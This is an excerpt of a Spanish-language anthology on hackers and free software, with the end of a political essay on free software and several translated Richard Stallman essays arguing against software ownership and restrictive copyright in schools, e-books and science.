Page 192: Internet, hackers y software li   varios

alerta y no relajarnos ante los éxitos ylos cantos de sirena que vienen de fuera:el capitalismo ha sido capaz derecuperar, privatizar y mercantilizarcasi todos los aspectos de la produccióny de la vida, desde lo material a loinmaterial. ¿Por qué no va a poder hacerlo mismo con el software libre? Dehecho, hay ya bastantes indicios queapuntan a la recuperación mercantilistade la capacidad de innovación delhacker. El asalto masivo de las grandesempresas, con perspectivaexclusivamente mercantil, podría versecomo un troyano[46] introducido en elsoftware libre y que, con el tiempo,

Page 193: Internet, hackers y software li   varios

parasite y desactive la potencia de lacomunidad. ¿De qué modo? Laconfusión con el tema de las licencias,por ejemplo, está debilitandoprogresivamente la filosofía de fondodel software libre (por eso la FSF seesfuerza tanto en explicar las diferenciasentre unas y otras), haciendo que algunasempresas hagan pasar por libresdesarrollos que no lo son, o bienpopularizando distribucionescomerciales Linux que mezclan softwarepropietario con la base libre del sistemaGNU/Linux.

Lo primero la confusión con laslicencias puede causar desconfianza

Page 194: Internet, hackers y software li   varios

entre los desarrolladores, que teman quesu trabajo pueda ser finalmentereapropiado y privatizado, y lo segundolas distribuciones GNU/Linux queañaden software no libre tapona eldesarrollo de opciones libres quereemplacen esas soluciones propietariasy se legitima software propietario comosi por el hecho de funcionar bajoGNU/Linux fuese menos propietario ymás aceptable. Por su parte, la OpenSource Initiative (OSI) no ha ayudadomucho a aclarar este panorama. Surgiócomo propuesta de algunos hackers paraacabar con una ambigüedad (free eninglés, significa libre pero también

Page 195: Internet, hackers y software li   varios

gratis) y con un término que al parecerdisuadía a las empresas, pero a cambioha introducido otras tal vez peores: conel concepto open source (fuenteabierta) que proponen como sustituto asoftware libre se pone solo el acento enque el código fuente esté disponible, sinincidir en las otras dos liberta des(poder copiar y poder redistribuirlibremente). Es decir para solucionaruna ambigüedad, se ha creado otramayor.

Otro problema derivado del troyanode la mercantilización son los agravioscomparativos que pueden producirseentre hackers que cobran de

Page 196: Internet, hackers y software li   varios

multinacionales mucho dinero por elmismo trabajo y proyecto en que otrosparticipan sin cobrar. También hemoscitado el peligro de que las empresasmarquen las prioridades de desarrollo yque se privatice el conocimiento. Estoúltimo la privatización del conocimientoentronca con dos de los problemas másgraves con los que se debe medir elsoftware libre: 1) la poca o nuladisponibilidad de los fabricantes afacilitar información técnica relevantesobre sus dispositivos, ni a fabricardrivers para GNU/Linux que per mitanutilizar los nuevos dispositivos que vanapareciendo en el mercado; y 2) las

Page 197: Internet, hackers y software li   varios

patentes del software, como forma deprivatización de las ideas, verdaderaamenaza para el software libre, ya queobligan a esperar durante años a queexpiren patentes de invención que soncruciales para poder utilizardeterminados programas.

Algunas de esos elementos, o varioscombinados entre sí, podríandesmoronar la cooperación sin mando y,por tanto, la comunidad de softwarelibre tal y como hoy la conocemos: y sino hay comunidad, no hay softwarelibre; puede haber fuentes abiertas ypúblicas incluso, pero no software libre.Se hace pues cada vez más necesario un

Page 198: Internet, hackers y software li   varios

análisis político del software libre quelleve a una toma de postura política o, sise prefiere, a una apuesta ética que noponga en primer lugar la conveniencia ola mera instrumentalización de si esmejor o peor que las opcionespropietarias.

Estamos ante un fenómeno queescapa claramente a los parámetrosclásicos de la economía política y de laideología: escapa a los parámetrosideológicos al uso, pues ni acaba deencajar en una visión antagonista —haygrandes dosis de pragmatismo y noexiste una visión decididamenteanticapitalista— y tampoco encaja en el

Page 199: Internet, hackers y software li   varios

neoliberalismo puro y duro —la libertadabsoluta es un valor fundamental delmovimiento, sí, pero no el único pueshay también principios éticos acerca delo público, del apoyo mutuo y delacceso igualitario y horizontal a losrecursos del conocimiento y en contra dela privatización del saber humano.

Es una nueva noción de bienpúblico, no tutelado por el mercado nipor el Estado: es un nuevo espaciopúblico no estatal. No hay duda de queun nuevo modelo de cooperación socialproductiva ha surgido en torno alsoftware libre: falta saber lo que daráde sí esa comunidad, además de buenas

Page 200: Internet, hackers y software li   varios

herramientas informáticas, y si estenuevo paradigma podrá extenderse aotros sectores de la produccióninmaterial. Estamos pues ante unaverdadera contienda política, que noestá ganada ni mucho menos, y querequiere determinación y apoyo alsoftware libre y una lucha decididacontra las patentes de software y demásleyes sobre la propiedad intelectual queprevisiblemente podrían detener suavance.[47] Me gustaría acabar citandounas palabras de los paleoantropólogosCarbonell y Sala, del proyectoAtapuerca, pues me parecen unmagnífico colofón que de algún modo

Page 201: Internet, hackers y software li   varios

resume y explica dónde reside lasingularidad y la potencia del softwarelibre: No es la humanización de latecnología lo que debemos buscar, sinosu socialización. No es posiblehumanizar algo que es exclusivamentehumano. La socialización es lo quepermite un crecimiento exponencial delas capacidades humanas. [48]

Reconocimientos

Sin la propuesta primero y lainsistencia después de la Oficina 2004

Page 202: Internet, hackers y software li   varios

de Barcelona para escribir estaintroducción política al software libre,probablemente nunca me habría puesto aello. Al primero que escuché explicarcon claridad la diferencia entre elacercamiento ético y el pragmático alsoftware libre fue a Jesús González-Barahona. Buena parte de las ideasexpresadas en la sección Desafíos einterrogantes son fruto de misfrecuentes conversaciones con MargaPadilla, de quien tanto he aprendido a lolargo de muchas horas de hacking —y devida— compartidas durante estos tresúltimos años. Agradezco también laatenta lectura que Luis Pueyo hizo de la

Page 203: Internet, hackers y software li   varios

versión preliminar de este artículo,cuyas críticas, comentarios y sutilesobservaciones sin duda han mejorado eltexto final. Por último, but not least, laconfianza y el apoyo del CSOA elLaboratorio a la telemática antagonistame ha permitido aprender a socializar elconocimiento y ha demostrado que sonposibles en un centro social okupadoproyectos estables de autoproducciónbasados en nuevas tecnologías.

Lavapiés, Madrid Agosto de 2000.

Page 204: Internet, hackers y software li   varios

Por que el software nodebe tener

propietarios

Richard Stallman es un prestigiosohacker neoyorquino. El editor Emacs essu creación más famosa. Nació en 1954,se graduó en Harvard en 1971 y trabajóen el laboratorio de InteligenciaArtificial del MIT hasta principios de los‘80. Cuando la mayoría de suscompañeros partió en busca de empleoen grandes empresas, decidió iniciar elproyecto GNU para mantener vivo elespíritu de colaboración y trabajocolectivo de los primeros hackers. En la

Page 205: Internet, hackers y software li   varios

actualidad lidera la Free SoftwareFoundation (Fundación Software Libre)que promueve la democratización delacceso a los programas y las nuevastecnologías.

La selección de notas y artículos queaquí se presenta, reúne intervencionesrealizadas por Stallman en distintosmedios acerca de temas vinculados conla idea del software libre y susimplicaciones en otros ámbitos de lacultura y la economía, como laeducación, las leyes de derechos deautor y las políticas estatales sobrepatentes.

Las tecnologías digitales de lainformación contribuyen al mundohaciendo que sea más fácil copiar y

Page 206: Internet, hackers y software li   varios

modificar información. Los ordenadoresprometen hacer esto más fácil paratodos.

Pero no todo el mundo quiere quesea más fácil. El sistema del copyrightpermite que los programas de softwaretengan propietarios, la mayor parte delos cuales pretenden privar al resto delmundo del beneficio potencial delsoftware. Los propietarios desearían serlos únicos con capacidad para copiar ymodificar el software que usamos.

El sistema de copyright creció con laimprenta una tecnología para laproducción masiva de copias. Elcopyright se ajustaba bien a esta

Page 207: Internet, hackers y software li   varios

tecnología puesto que era restrictivasólo para los productores masivos decopias. No privaba de libertad a loslectores de libros. Un lector cualquiera,que no poseyera una imprenta, sólopodía copiar libros con pluma y tinta, ya pocos lectores se les ponía un pleitopor ello.

Las tecnologías digitales son másflexibles que la imprenta: cuando lainformación adopta forma digital, sepuede copiar fácilmente paracompartirla con otros. Es precisamenteesta flexibilidad la que se ajusta mal aun sistema como el del copyright. Esa esla razón del incremento de medidas

Page 208: Internet, hackers y software li   varios

perversas y draconianas que se empleanen la actualidad para hacer cumplir elcopyright del software. Consideremosestas cuatro prácticas de la SoftwarePublishers Association [SPA[49]]:Propaganda masiva afirmando que estámal desobedecer a los propietarios paraayudar a un amigo.Pedir a la gente que se conviertan ensoplones para delatar a sus colegas ycompañeros de trabajo.Redadas (con ayuda policial) enoficinas y escuelas, en las que la gentedebe probar que son inocentes de hacercopias ilegales.El proceso judicial por parte del

Page 209: Internet, hackers y software li   varios

gobierno de los EE.UU, a petición de laSPA, de personas como DavidLaMacchia, del MIT, no por copiarsoftware (no se le acusa de copiarnada), sino sencillamente por dejar sinvigilancia equipos de copia y nocensurar su uso.

Cada una de estas cuatro prácticasse asemeja a las usadas en la antiguaUnión Soviética, donde todas lascopiadoras tenían un vigilante paraprevenir copias prohibidas, y donde laspersonas tenían que copiar informaciónen secreto y pasarla mano a mano enforma de samizdat. Por supuesto hay unadiferencia: el motivo para el control de

Page 210: Internet, hackers y software li   varios

información en la Unión Soviética erapolítico; en los EE.UU el motivo es elbeneficio económico. Pero son lasacciones las que nos afectan, no elmotivo. Cualquier intento de bloquear elcompartir información, no importa lacausa, lleva a los mismos métodos y a lamisma dureza.

Los propietarios utilizan diversosargumentos para que se les conceda elcontrol del modo en que usamos lainformación:Insultos: Los propietarios usan palabrasdifamatorias como piratería y robo, aligual que terminología técnica comopropiedad intelectual y daño, para

Page 211: Internet, hackers y software li   varios

sugerir una cierta línea de pensamientoal público una analogía simplista entreprogramas y objetos físicos. Nuestrasideas e intuiciones acerca de lapropiedad sobre los objetos materialessuelen referirse a si es justo quitarle unobjeto a alguien. No se aplicandirectamente a hacer una copia de algo.Pero los propietarios nos piden que lasapliquemos en cualquier caso.Exageración Los propietarios dicen quesufren un daño o pérdida económicacuando los usuarios copian programaspor su cuenta. Pero el copiar no tiene unefecto directo sobre el propietario, y nohace daño a nadie. El propietario sólo

Page 212: Internet, hackers y software li   varios

puede perder si la persona que hizo lacopia hubiese pagado por una delpropietario en su lugar.

Un mínimo de reflexión muestra quela mayoría de tales personas no habríancomprado esas copias. Aun así lospropietarios calculan sus pérdidas comosi todos y cada uno hubiesen compradouna copia. Esto es una exageración pordecirlo de una manera suave.La ley Los propietarios a menudodescriben el estado actual de la ley, asícomo las duras sanciones con las quenos amenazan. En este enfoque vaimplícita la sugerencia de que la leyactual refleja un punto de vista moral

Page 213: Internet, hackers y software li   varios

incuestionable y aún así, al mismotiempo, se nos insta a considerar estassanciones como hechos naturales por losque no se puede responsabilizar a nadie.Esta línea de persuasión no estádiseñada para defenderse ante elpensamiento crítico; está concebida parareforzar un lugar común.

Es evidente que las leyes nodistinguen lo que está bien de lo que estámal. Todo estadounidense debería saberque, hace cuarenta años, iba contra laley que un persona de raza negra sesentase en la parte delantera delautobús; pero solamente los racistasdirían que sentarse ahí no estaba bien.

Page 214: Internet, hackers y software li   varios

Derechos naturales Los autores amenudo sostienen que existe unaconexión especial con los programasque han escrito, y añaden que, enconsecuencia, sus deseos e interesesrespecto al programa simplementeprevalecen sobre aquellos de cualquierotra persona o incluso de los del restodel mundo. (Normalmente son lasempresas, no los autores, los queretienen los copyrights sobre elsoftware, pero se espera de nosotros queignoremos esta discrepancia.)

A quienes proponen esto como unaxioma ético el autor es más importanteque tú sólo les puedo decir que yo

Page 215: Internet, hackers y software li   varios

mismo, un notable autor de software,[50]

lo considero una tontería.Pero la gente por lo general sólo

suele sentir alguna simpatía hacia losderechos naturales por dos razones.

Una razón es una analogía forzadaentre el software y los objetosmateriales. Cuando yo cocino spaghettis,me quejo si otra persona se los come,porque entonces yo ya no me los puedocomer. Su acción me duele exactamentetanto como lo que le beneficia a él; sólouno de nosotros se puede comer losspaghettis, así que la pregunta es:¿quién? La más mínima distinción entrealguno de nosotros es suficiente para

Page 216: Internet, hackers y software li   varios

inclinar la balanza ética.Pero el hecho de que tú ejecutes o

modifiques un programa que yo heescrito te afecta a ti directamente y a míindirectamente. Si tú le das una copia atu amigo te afecta a ti y a tu amigomucho más que lo que me afecta a mí.Yo no debería tener el poder de decirteque no hagas estas cosas. Nadie debería.

La segunda razón es que a la gente sele ha dicho que los derechos naturalesde autor son una tradición aceptada eindiscutida de nuestra sociedad.

Desde un punto de vista histórico,sucede justamente lo contrario. La ideade los derechos naturales de autor fue

Page 217: Internet, hackers y software li   varios

propuesta y decididamente rechazadacuando se concibió la Constitución deEE.UU Esa es la razón por la que laConstitución sólo permite un sistema decopyright y no requiere uno; por esarazón dice que el copyright debe sertemporal. Establece asimismo que elpropósito del copyright es promocionarel progreso no recompensar a losautores. El copyright recompensa a losautores en cierta medida, y a loseditores más, pero se concibe como unmedio de modificar su comportamiento.

La tradición realmente establecidade nuestra sociedad es que el copyrightvulnera los derechos naturales del

Page 218: Internet, hackers y software li   varios

público y que esto sólo se puedejustificar por el bien del público.[51 ]

Economía El último argumento que seemplea para justificar la existencia delos propietarios de software es que estolleva a la producción de más software.

A diferencia de los anteriores, esteargumento por lo menos adopta unenfoque legítimo sobre el tema. Se basaen un objetivo válido satisfacer a losusuarios de software. Y estáempíricamente demostrado que la genteproducirá más de algo si se les pagabien por ello.

Pero el argumento económico tieneun defecto: se basa en la presunción de

Page 219: Internet, hackers y software li   varios

que la diferencia es sólo cuestión decuánto dinero debemos pagar. Asumeque la producción de software es lo quequeremos, tenga el software propietarioso no.

La gente acepta gustosamente estapresunción porque está de acuerdo connuestra experiencia acerca de losobjetos materiales. Considérese unbocadillo, por ejemplo. Es posible quepuedas conseguir un bocadilloequivalente bien gratis o por un precio.Si es así, la cantidad que pagas es laúnica diferencia. Tanto si lo tienes quecomprar como si no, el bocadillo tieneel mismo sabor, el mismo valor

Page 220: Internet, hackers y software li   varios

nutricional y en ambos casos te lopuedes comer sólo una vez. El hecho desi el bocadillo lo obtienes de unpropietario o no, no puede afectardirectamente a nada más que la cantidadde dinero que te queda después.

Esto es cierto para cualquier objetomaterial el hecho de que tenga o notenga propietario no afecta directamentea lo que es, o a lo que puedas hacer conello si lo adquieres.

Pero si un programa tiene unpropietario, esto afecta en gran medida alo que es, y a lo que puedes hacer con uncopia si la compras. La diferencia no essólo una cuestión de dinero. El sistema

Page 221: Internet, hackers y software li   varios

de propietarios de software incentiva alos propietarios de software a produciralgo pero no lo que la sociedadrealmente necesita. Y causa unacontaminación ética intangible que nosafecta a todos.

¿Qué es lo que la sociedad necesita?Necesita información que estéperdaderamente a disposición de susciudadanos por ejemplo, programas quela gente pueda leer, arreglar, adaptar ymejorar, no solamente ejecutar. Pero loque los propietarios de softwaretípicamente ofrecen es una caja negraque no podemos ni estudiar ni modificar.

La sociedad también necesita

Page 222: Internet, hackers y software li   varios

libertad. Cuando un programa tiene unpropietario, los usuarios pierden lalibertad de controlar una parte de suspropias vidas.

Y sobre todo una sociedad necesitaincentivar el espíritu de cooperaciónentre sus ciudadanos. Cuando lospropietarios de software nos dicen queayudar a nuestros vecinos de una maneranatural es piratería, están contaminandoel espíritu cívico de nuestra sociedad.

Esto es por lo que decimos que elsoftware libre es una cuestión delibertad, no de precio.[52]

El argumento económico parajustificar la propiedad es erróneo, pero

Page 223: Internet, hackers y software li   varios

la cuestión económica es real. Algunaspersonas escriben software útil por elplacer de escribirlo o por la admiracióny amor al arte;[53] pero si queremos mássoftware del que esas personas escriben,necesitamos conseguir fondos.

Desde hace ya diez años, losdesarrolladores de software libre hanprobado varios métodos para recabarfondos, con algo de éxito. No haynecesidad de hacer rico a nadie; losingresos medios de una familia media,alrededor de 35.000 dólares, prueba serincentivo suficiente para muchostrabajos que son menos satisfactoriosque programar.

Page 224: Internet, hackers y software li   varios

Durante años, hasta que una beca lohizo innecesario, yo me ganaba la vidarealizando mejoras a medida sobresoftware libre que yo había escrito.Cada mejora se añadía a la versiónstandard lanzada y así, finalmente,quedaban disponibles para el público engeneral. Los clientes me pagaban paraque trabajase en las mejoras que ellosquerían, en vez de en las característicasque yo habría considerado la máximaprioridad.

La Fundación para el SoftwareLibre, una entidad sin ánimo de lucroexenta de impuestos para el desarrollode software libre, consigue fondos

Page 225: Internet, hackers y software li   varios

mediante la venta de CD-ROMs deGNU,[54] camisetas, anuales ydistribuciones deluxe (todo lo cual losusuarios son libres de copiar ymodificar), así como mediantedonaciones. Ahora cuenta con un equipode cinco programadores, y tresempleados [cuando se escribió elartículo] que se encargan de los pedidospor correo.

Algunos desarrolladores de softwarelibre ganan dinero mediante la venta deservicios de soporte. CygnusSupport,[55] que cuenta con alrededor de50 empleados, estima que en torno al 15por ciento de la actividad de su equipo

Page 226: Internet, hackers y software li   varios

es desarrollo de software libre unporcentaje respetable para unacompañía de software.

Algunas compañías, incluyendoIntel, Motorola, Texas Instruments yAnalog Devices, han unido esfuerzospara financiar el desarrollo continuadodel compilador GNU para el lenguaje C.Mientras, el compilador GNU para ellenguaje Ada está siendo financiado porla Fuerza.

Aérea de EE.UU, que cree que estaes la manera más efectiva de conseguirun compilador de alta calidad.[56]

Todos estos ejemplos sonmodestos[57] ; el movimiento de

Page 227: Internet, hackers y software li   varios

software ibre es pequeño y todavíajoven. Pero el ejemplo de la radiomantenida-por-la-audiencia[58] en losEE.UU muestra que es posible manteneruna actividad grande sin forzar a cadausuario a pagar.

Como usuario de informática hoy endía, puede que estés utilizando unprograma propietario [proprietaryprogram]. Si tu amigo te pide hacer unacopia, estaría mal negarse a ello. Lacooperación es más importante que elcopyright. Pero una cooperaciónclandestina, escondida, no contribuye amejorar la sociedad. Una personadebería aspirar a vivir una vida

Page 228: Internet, hackers y software li   varios

abiertamente con orgullo, y estosignifica decir No al softwarepropietario [proprietary software].

Te mereces ser capaz de cooperarabierta y libremente con otras personasque usan software. Te mereces ser capazde aprender cómo funciona el software,y enseñar a tus estudiantes con él. Temereces ser capaz de contratar a tuprogramador favorito para arreglarlocuando se rompa.

Te mereces el software libre.

Page 229: Internet, hackers y software li   varios

¿Por que las escuelasdeberian usar solo

software libre?

Existen razones generales por lasque todos los usuarios de computadorasdeberían insistir en usar software libre.Éste les da a los usuarios la libertad decontrolar sus propias computadoras; conel software propietario, la computadorahace lo que el dueño del software quiereque haga, no lo que usted quiere.También les da a los usuarios la libertadde cooperar entre sí, de actuar

Page 230: Internet, hackers y software li   varios

correctamente. Esto cuenta para lasescuelas tanto como para el resto de laspersonas. Pero existen razones que seaplican especialmente al caso de lasescuelas.

Primero, el software libre puedeahorrarle dinero a las escuelas. Hasta enlos países más ricos las escuelas tienenpocos fondos. El software libre les da alas escuelas, como a otros usuarios, lalibertad de copiar y redistribuir elsoftware, con lo que el sistema escolarpuede hacer copias para todas lascomputadoras en todas las escuelas. Enpaíses pobres, esto puede ayudar aachicar la brecha digital.

Page 231: Internet, hackers y software li   varios

Esta razón obvia, si bien esimportante, es bastante superficial. Y losfabricantes de software propietariopueden salvar la situación donandocopias de sus programas. (¡Cuidado!Una escuela que acepte esta oferta puedetener que pagar para recibir lassiguientes versiones.) Así que pasemosa las razones más profundas.

Las escuelas deben enseñar a susestudiantes maneras de vivir quebeneficien a la sociedad como un todo.Así, deberían impulsar el uso delsoftware libre, tal como impulsan elreciclaje. Si las escuelas enseñansoftware libre a sus estudiantes,

Page 232: Internet, hackers y software li   varios

entonces éstos usarán software librecuando se gradúen. Esto ayudará a quela sociedad en su conjunto evite serdominada (y extorsionada) pormegacorporaciones. Esas corporacionesles ofrecen muestras gratis a lasescuelas por la misma razón por la quelas compañías de tabaco distribuyencigarrillos gratis: para hacer adictos alos chicos.[59] No les van seguirhaciendo descuentos a estos estudiantesuna vez que crezcan y se gradúen.

El software libre permite a losestudiantes aprender cómo funcionan losprogramas. Cuando los chicos llegan ala adolescencia, algunos de ellos

Page 233: Internet, hackers y software li   varios

quieren aprender todo lo que se puedasobre sus sistemas de computadoras ysus programas. Esa es la edad en que laspersonas que serán buenosprogramadores deberían aprenderlo.Para aprender a escribir buenosprogramas, los estudiantes necesitan leery escribir muchos programas. Necesitanleer y entender programas reales que lagente realmente utiliza. Sentirán unaenorme curiosidad por leer los códigosfuente.

El software propietario repele sused de conocimiento; les dice, Elconocimiento que ustedes quieren es unsecreto, ¡aprender está prohibido!.

Page 234: Internet, hackers y software li   varios

El software libre alienta a todos aaprender. La comunidad del softwarelibre rechaza el «sacerdocio de latecnología», que mantiene al públicogeneral en ignorancia respecto a cómofunciona la tecnología; alentamos a losestudiantes de cualquier edad y posicióna leer el código fuente y aprender tantocomo quieran saber. Las escuelas queusen software libre alentarán a losdiestros en software a que se superen.

La siguiente razón es todavía másprofunda que esto. Esperamos que lasescuelas les enseñen a los estudiantesconocimientos básicos y destrezasútiles, pero esta no es toda su tarea. La

Page 235: Internet, hackers y software li   varios

misión más importante de las escuelases enseñar a las personas a ser buenasciudadanas y buenos vecinos, a cooperarcon los otros que necesitan su ayuda. Enel ámbito de las computadoras estosignifica enseñarles a compartirsoftware. Las escuelas primarias, sobretodo, deben enseñarles a sus alumnos,«Si traes programas a la escuela, debesque compartirlos con los otros chicos».Por supuesto, la escuela debe cumplircon lo que enseña: todo el softwareinstalado en la escuela debe estardisponible para que los estudiantes locopien, lo lleven a casa y loredistribuyan.

Page 236: Internet, hackers y software li   varios

Enseñarles a los chicos a usarsoftware libre, y a participar en lacomunidad de software libre, es unalección práctica de educación cívica.También enseña a los estudiantes el rolmodelo del servicio público antes que eldel exitismo. Todos los niveles deeducación deben usar software libre.

Copyright 2003 RichardStallman La reproducciónliteral y la distribución deeste artículo en su totalidady sin regalías se permitenpara cualquier medio en tantose mantenga esta nota.

Page 237: Internet, hackers y software li   varios

Libertad, ¿ocopyright?

Había una vez, en la época de laimprenta, una regulación industrialestablecida para el negocio de escribir yeditar. Se llamaba copyright. Elpropósito del copyright era fomentar lapublicación de una diversidad de obrasescritas. El método del copyright eraobligar a los editores a pedir permiso alos autores para volver a editar escritosrecientes.

Los lectores corrientes tenían pocosmotivos para rechazarlo, puesto que el

Page 238: Internet, hackers y software li   varios

copyright sólo restringía la publicación,no las cosas que un lector podía hacer.Si subía el precio del libro en unapequeña cantidad, sólo era el dinero. Elcopyright ofrecía un beneficio público,como había sido pensado, con apenascarga para el público. Cumplía bien sucometido, por aquel entonces.

Entonces surgió una nueva forma dedistribuir información: computadoras yredes. La ventaja de la tecnología deinformación digital es que facilita lacopia y manipulación de información,incluyendo software, grabacionesmusicales y libros. Las redes ofrecían laposibilidad de acceso ilimitado a toda

Page 239: Internet, hackers y software li   varios

clase de datos: una utopía de lainformación.

Pero había un obstáculo en elcamino: el copyright. Los lectores quehacían uso de sus computadoras paracompartir información publicada, erantécnicamente infractores del copyright.El mundo había cambiado y lo que habíasido una vez regulación industrial sehabía convertido en una restricción alpúblico que debería de servir.

En una democracia, una ley queprohíbe una actividad popular, natural yútil, habitualmente se relaja pronto. Perogrupos de presión de poderosos editoresestaban determinados a impedir al

Page 240: Internet, hackers y software li   varios

público aprovechar la ventaja de suscomputadoras y encontraron en elcopyright un arma apropiada. Bajo suinfluencia, en vez de relajar el copyrightpara adecuarlo a las nuevascircunstancias, los gobiernos lo hicieronmucho más estricto, aplicando penasseveras a lectores sorprendidoscompartiendo.

Pero eso no iba a ser lo último. Lascomputadoras pueden ser potentesherramientas de dominio cuando unospocos controlan qué hacen lascomputadoras de otras personas. Loseditores advirtieron que obligando a lagente a usar software especialmente

Page 241: Internet, hackers y software li   varios

diseñado para leer libros electrónicos,podrían lograr un poder sin precedentes:¡obligarían a los lectores a pagar y aidentificarse cada vez que leyesen unlibro!

Este era el sueño de los editores, ylograron convencer al gobiernoestadounidense para promulgar laDigital Millennium Copyright Act [Leyde Copyright del Milenio Digital] de1998. Esta ley otorga a los editores elpoder legal total sobre casi todo lo queun lector puede hacer con un libroelectrónico. ¡Incluso la lectura noautorizada es delito!

Todavía tenemos las mismas

Page 242: Internet, hackers y software li   varios

libertades de antes usando libros enpapel. Pero si los libros electrónicossustituyen a los impresos, esa excepciónservirá de muy poco. Con la «tintaelectrónica», que hace posible descargarun nuevo texto en un trozo de papelaparentemente impreso, incluso losperiódicos podrían volverse efímeros:no más librerías de libros usados, nomás préstamos de libros a amigos, nomás préstamos de libros en la bibliotecapública —no más «fugas» que podríandar la oportunidad de leer sin pagar (y ajuzgar por los anuncios de MicrosoftReader, no más compras anónimas delibros tampoco). Éste es el mundo que

Page 243: Internet, hackers y software li   varios

los editores han pensado para nosotros.¿Por qué hay tan poco debate

público sobre estos cambios capitales?La mayoría de los ciudadanos no hantenido todavía ocasión de asumir lasconsecuencias políticas que surgen deesta tecnología futurista. Además, alpúblico se le ha enseñado que elcopyright existe para «proteger» a lostitulares del copyright, con laconsecuencia añadida de que losintereses del público no cuentan.

Pero cuando el público en generalempiece a usar libros electrónios ydescubra el régimen que los editores leshan preparado, empezarán a oponerse.

Page 244: Internet, hackers y software li   varios

La humanidad no aceptará este yugo porsiempre.

Los editores nos han hecho creer queun copyright represivo es la única formade mantener viva la creación artística,pero no necesitamos una Guerra por lasCopias para fomentar la diversidad deobras publicadas; como ha mostradoGrateful Dead la copia privada entreadmiradores no es necesariamente unproblema para los artistas. Legalizandola copia de libros electrónicos entreamigos, podemos volver a convertir elcopyright en la regulación industrial queuna vez fue.

Para cierta clase de escritos,

Page 245: Internet, hackers y software li   varios

debemos ir incluso más allá. Paraartículos académicos y monografías, supublicación íntegra en la red debería seralentada en todos los casos; esto ayuda aproteger los escritos académicoshaciéndolos más accesibles. En el casode libros de texto y de la mayoría deobras de referencia, la publicación deversiones modificadas debería inclusopermitirse, puesto que fomentan sumejora.

Con el tiempo, cuando las redes decomputadoras ofrezcan una formasencilla de mandar un poco de dinero aalguien, toda la base para restringir lacopia literal desaparecerá. Si le gusta un

Page 246: Internet, hackers y software li   varios

libro y aparece una ventanita de sucomputadora que dice: «cliqueé aquípara dar un dólar al autor», ¿no lo haría?El copyright para libros y música,aplicado a la distribución de copiasliterales no modificadas, se volverátotalmente obsoleto. ¡Y ni un segundoantes!

Copyright 2000 RichardStallman. Se permite la copiay redistribución literal deeste artículo en su totalidaden cualquier medio, si semantiene esta nota.

Page 247: Internet, hackers y software li   varios

La ciencia debesacarse el copyright de

encima

Debería ser obvio que la literaturacientífica existe para diseminar elconocimiento científico, y que lasrevistas científicas existen para facilitaresto. De ello se concluye que las reglaspara el uso de la literatura identíficadeberían estar diseñadas para alcanzartal meta.

Las reglas con que contamos ahora,conocidas como copyright, fueron

Page 248: Internet, hackers y software li   varios

establecidas en la época de la imprenta,que es un método inherentementecentralizado de producción de copias agran escala. En un escenario basado enimprentas, el copyright sobre artículosde revistas se restringía sólo a loseditores requiriéndoles que obtengan unpermiso para publicar un artículo ysobre eventuales plagiadores. Ayudabaa las revistas a funcionar y diseminar elconocimiento, sin interferir en el valiosotrabajo de los científicos y estudiantes,ya sea como escritores o lectores deartículos. Estas reglas se adecuaban bienal sistema.

La tecnología actual para las

Page 249: Internet, hackers y software li   varios

publicaciones científicas es, sinembargo, la World Wide Web. ¿Quéreglas asegurarían mejor la más ampliadiseminación de artículos científicos yde conocimiento en la Web? Losartículos deberían distribuirse enformatos no privativos [non proprietaryformats], con acceso libre para todos. Ytodo el mundo debería tener el derechode reproducir los artículos; esto es,hacer ediciones textuales con elreconocimiento debido a los autores.

Estas reglas deberían aplicarse paraartículos antiguos tanto como para losfuturos, cuando se distribuyen de formaelectrónica. Pero no hay ninguna

Page 250: Internet, hackers y software li   varios

necesidad de cambiar el actual sistemade copyright tal como opera para lapublicación de revistas en papel, ya queel problema no reside en ese ámbito.

Lamentablemente, parece que notodos acuerdan con las obvieda des quemencionamos al comenzar este artículo.Muchos editores de revistas parecencreer que el propósito de la literaturacientífica es permitirles publicarrevistas para que puedan cobrarsuscripciones de científicos yestudiantes. Esta manera de pensar seconoce como confusión de los medioscon los fines.

Su modo de hacer las cosas consiste

Page 251: Internet, hackers y software li   varios

en restringir incluso el acceso a la meralectura de literatura científica a aquellosque pueden y quieren pagar por ella.Utilizan las leyes de copyright, quesiguen vigentes a pesar de suinadecuación a las redes decomputadoras, como excusa para evitarque los científicos decidan reglasnuevas.

Por el bien de la cooperacióncientífica y el futuro de la humanidad,debemos rechazar esta visión de raíz nosólo los sistemas obstructivos que sehan instituido, sino las mismasprioridades equivocadas en las que sefundamentan.

Page 252: Internet, hackers y software li   varios

Los editores de revistas a vecessostienen que el acceso on-line requierecostosas computadoras de altorendimiento como servidores, y queellos deben cobrar tarifas de accesopara pagar esos servidores. Esteproblema es una consecuencia de supropia solución. Denle la libertad atodas las personas de copiar y poner ensu sitio de Internet los artículoscientíficos, y las bibliotecas de todo elmundo abrirán sitios de acceso concopias para satisfacer la demanda. Estasolución descentralizada reducirá losrequisitos de ancho de banda y proveeráun acceso más veloz, al tiempo que

Page 253: Internet, hackers y software li   varios

protegerá los trabajos académicoscontra pérdidas accidentales.

Los editores también sostienen queel trabajo editorial requiere que secobre por el acceso. Aceptemos lapremisa de que los editores debencobrar por su tarea; esto no invalidanuestra propuesta. El costo de ediciónde un trabajo científico corriente estáentre el 1% y el 3% del financiamientoen investigación para producirlo. Unporcentaje tan reducido difícilmentedebería obstruir el uso de los resultados.

En cambio, el costo de ediciónpodría obtenerse, por ejemplo, a travésde tarifas a los autores, que pueden

Page 254: Internet, hackers y software li   varios

trasladarlas a su vez a las entidades quepromueven su investigación. A éstas nodebería importarles, dado queactualmente pagan por las publicacionesde una manera mucho más aparatosa eindirecta al pagar por la suscripción dela bibliotecas universitarias a lasrevistas. Cambiando el modeloeconómico para asignar los costos deedición a las entidades de apoyo,podemos eliminar la aparente necesidadde restringir el acceso. Los autoresocasionales que no estén afiliados aninguna entidad o institución, y que noreciben ayuda financiera, podrían sereximidos de los costos de publicación,

Page 255: Internet, hackers y software li   varios

siendo asumidos éstos por los autoresque sí reciben ayuda.

Otra justificación para las tarifas deacceso a las publicaciones on-line es lanecesidad de financiar la conversión delos archivos impresos en papel aformato digital. Este trabajo deberealizarse, pero debemos buscarmaneras alternativas de financiarlo queno impliquen obstruir el acceso a losresultados. El trabajo en sí no será máscomplicado, ni será más costoso. Es unsinsentido digitalizar los archivos paraluego desperdiciar los resultadosrestringiendo el acceso a ellos.

La Constitución de Estados Unidos

Page 256: Internet, hackers y software li   varios

dice que el copyright existe parapromover el progreso de la ciencia .Cuando el copyright impide el progresode la ciencia, la ciencia debe sacarse deencima el copyright.

